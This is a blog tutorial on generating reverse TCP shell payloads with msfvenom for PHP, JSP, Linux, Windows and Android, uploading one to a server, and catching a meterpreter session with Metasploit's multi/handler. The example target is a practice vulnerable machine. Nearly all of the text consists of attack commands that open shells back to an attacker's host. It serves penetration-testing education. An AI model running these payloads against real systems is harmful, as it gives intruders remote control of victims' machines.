Jul 03, 2020

Reverse TCP shell with Metasploit

Metasploit is an awesome tool. It can be used to automate the exploitation process, generate shellcodes, use as a listener, etc. I hope to start a tutorial serious on the Metasploit framework and it's partner programs. So in today's tutorial, we are going to see how we can build a reverse TCP shell with Metasploit. As an example, we use msfvenom for creating a web shell in PHP and use Metasploit to get the session. It can create a reverse TCP connection to our mashing.

Reverse TCP vs Bind TCP shell

First of all let's clarify what is a reverse TCP shell, What's a bind shell and how they work. In both of these situations, there is an Attacker mashing and a victim server. In a reverse shell, we open a connection from the victim server to the attacker's mashing. We set up a listener on the attacker's mashing. It waits for an incoming connection from the victim. When it receives the TCP connection it serves as a shell to access the victim server.

A bind shell works in a different way. The payload will bind a shell to a specific port on the victim server. So the attacker can use his mashing to connect back to the victim server.

Generating the exploit using Msfvenom

First, we use msfvenom for create our shell. This tool is packed with the Metasploit framework and can be used to generate exploits for multi-platforms such as Android, Windows, PHP servers, etc.

Following is the syntax for generating an exploit with msfvenom.

msfvenom -p php/meterpreter_reverse_tcp -o shell.php LHOST= LPORT=555

Here we have supplied many arguments to msfvenom tool. Let's see what they do. At the moment we don't use any encoding. In later we can use them.

Hear -p stands for payload. It tells which payload we want to use. Here we used meterpreter as the payload. You can get the list of available payloads by using the command msfvenom --list payloads. In the above example, we used a php payload since we are going to build a Web shell.

-o This is an output format. We have specified shell.php. So our output file will be saved as shell.php.

In the following list we can see some payload types we use often.

Web servers

Most Web servers run PHP as there server-side language. We can build a PHP web shell with MSFvenom by using "php/meterpreter_reverse_tcp" as the payload. Since we are uploading it to a PHP server the extension of the shell should be "PHP".

msfvenom -p php/meterpreter_reverse_tcp -o shell.php LHOST= LPORT=555

What about a JSP server. We can build a web shell as a JSP file and try to upload it. So we want to use "java/jsp_shell_reverse_tcp" as our payload and the output file type should be ".jsp".

msfvenom -p java/jsp_shell_reverse_tcp -o shell.jsp LHOST= LPORT=555

Linux platforms

If we want to attack a Linux server we can use "linux/x86/meterpreter/reverse_tcp" as our payload. Also we an use ".elf" as the output file.

msfvenom -p linux/x86/meterpreter/reverse_tcp -o shell.elf LHOST= LPORT=555

Windows mashings

For Windows, we can use meterpreter as the payload. So we should select "windows/meterpreter/reverse_tcp". As you know the extension should be ".exe".

msfvenom -p windows/meterpreter/reverse_tcp -o shell.exe LHOST= LPORT=555

Android devices

We know that Android is the world's most popular mobile operating system. Metasploit has various payloads for Android. vCommonly we use "android/meterpreter_reverse_tcp" to attack Android devices. The output file type should be ".APK".

msfvenom -p android/meterpreter_reverse_tcp -o shell.apk LHOST= LPORT=555

LHOST is the IP of attacker mashing. It should be our public IP. Because a reverse shell is connected from victim mashing to our mashing.

LPORT is any opened port on our mashing.

You can see we have generated our shell as a php file. Now we can use any method like RFI , FUV etc to upload this to a server. I'll use web for pentester vulnerable mashing. Before we execute our shell we want to set a listener for catch our connection.

Now we start metasploit framework. There some options to use Metasploit like msfcli, msfweb interface , armitage , msfconsole, etc. Most of times we use msfconsole for this.

Yes, a beautiful interface. This is an interactive shell and we can use it easily. First, we want to set a handler for our connection. The handler is responsible for handle reverse connections. Here we have used multi/handler . You can set it with use exploit command.

Now we have to set some extra options. Any time in msfconsole you can find which options you want to set by entering the command show options.

In the above pic, we can see we need to set LHOST and LPORT. Let's set them. Both of them are the same as what we used in generating our shell.

OK now is the time to attack. We use the command run to start the process.

It is waiting for an incoming connection. Now we can execute our shell on a web server.

Yes. It worked. we got our metepreter shell. Now we can do many things. I'll post another tutorial on meterpreter. Till then you can see what to do with command help . :-)

Mar 21
Assembly system calls

When we talk about computer programs, they do various tasks. Like printing a string to screen,....

Sep 23
PUSH and POP with stack

This is the second tutorial of our stack tutorial set. Hear we are going to talk about some two....

Aug 12
Reverse engineering a simple binary

Today I selected an interesting topic to discus. Hear we are going to disassemble a binary file and....

Replying to 's comment Cancel reply